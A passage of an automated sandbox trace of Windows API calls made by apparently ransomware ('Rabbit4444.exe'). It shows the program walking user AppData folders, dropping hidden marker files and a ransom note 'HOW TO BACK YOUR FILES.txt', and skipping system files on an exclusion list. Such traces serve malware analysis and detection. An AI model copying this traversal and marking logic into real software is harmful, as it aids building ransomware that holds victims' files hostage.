lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.385] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.385] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.386] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.386] CloseHandle (hObject=0x298) returned 1 [0062.386] CloseHandle (hObject=0x27c) returned 1 [0062.386] GetCurrentThreadId () returned 0xd98 [0062.386] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0062.386] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData" [0062.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0062.386] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData" [0062.386] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\" [0062.386] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0062.386] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.387] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.390] FlushFileBuffers (hFile=0x27c) returned 1 [0062.390] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.391] CloseHandle (hObject=0x27c) returned 1 [0062.391] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData") returned 89 [0062.391] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.391] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9162d1b2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223f2ed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee81d4ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0062.391] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.391] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.391] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.391] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.391] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9162d1b2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223f2ed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee81d4ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.391] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.391] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.391] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.391] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.391] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.392] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee81d4ec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee81d4ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee81d4ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.392] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.392] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.392] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee81d4ec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee81d4ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee81d4ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.392] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0062.392] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.392] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.392] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.393] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.393] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.393] CloseHandle (hObject=0x298) returned 1 [0062.393] CloseHandle (hObject=0x27c) returned 1 [0062.393] GetCurrentThreadId () returned 0xd98 [0062.393] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0062.393] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC" [0062.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123d48 | out: hHeap=0xe0000) returned 1 [0062.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0062.393] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC" [0062.393] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\" [0062.393] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0062.393] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.397] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.402] FlushFileBuffers (hFile=0x27c) returned 1 [0062.403] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.406] CloseHandle (hObject=0x27c) returned 1 [0062.408] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC") returned 84 [0062.408] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.408] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x39a819cf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee843675, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0062.408] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.408] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.408] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.408] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.408] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x39a819cf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee843675, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.409] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.409] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.409] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.409] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.409] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.409] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee843675, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee843675, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee843675, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.409] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.409] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.409] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223cdb7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9194e327, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0062.409] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0062.409] lstrcpyW (in: lpString1=0x130ebe2, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0062.409] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0062.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0062.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x11e2c0 [0062.409] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122108 [0062.409] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223d8d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9194e327, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0062.410] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0062.410] lstrcpyW (in: lpString1=0x130ebe2, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0062.410] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0062.411] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fc0 [0062.411] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116ad0 [0062.411] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fc8 | out: ListHead=0xf68b0, ListEntry=0x121fc8) returned 0x1222c8 [0062.411] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9194e327, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0062.411] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0062.411] lstrcpyW (in: lpString1=0x130ebe2, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0062.411] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0062.411] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0062.411] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116c70 [0062.411] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x121fc8 [0062.411] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223eab9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9194e327, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0062.412] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0062.412] lstrcpyW (in: lpString1=0x130ebe2, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0062.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0062.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x11e388 [0062.412] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122008 [0062.412] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223eab9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9194e327, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0062.412] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0062.412] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.412] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.413] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.413] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.413] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.413] CloseHandle (hObject=0x298) returned 1 [0062.414] CloseHandle (hObject=0x27c) returned 1 [0062.414] GetCurrentThreadId () returned 0xd98 [0062.414] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0062.414] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp" [0062.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e388 | out: hHeap=0xe0000) returned 1 [0062.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0062.414] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp" [0062.414] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\" [0062.414] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: 